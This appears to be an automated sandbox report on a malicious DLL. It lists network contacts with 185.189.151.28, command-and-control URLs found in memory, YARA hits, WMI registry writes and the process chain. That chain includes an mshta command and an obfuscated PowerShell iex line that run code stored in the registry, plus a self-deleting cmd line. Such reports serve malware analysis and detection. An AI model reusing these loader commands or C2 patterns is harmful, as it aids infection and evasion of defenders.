Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/ |
Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/A_2Fp |
Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz |
Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBr |
Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642541789.0000000000A80000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93d |
Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ |
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517515689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642709206.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE |
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/ws |
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642779966.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://config.edge.skype.com/drew/5_2BPw3OSauP4MGGq6siPB/_2BnCqBYV_2Ft/k9TDCaV5/kdb0RbX2RH_2FsWBq58E |
Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 0000000A.00000003.604947338.00000227AB271000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsof |
Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: Yara match |
File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR |
Source: Yara match |
File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR |
Source: Yara match |
File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP" |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Jump to behavior |
Source: Yara match |
File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR |
Source: Yara match |
File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
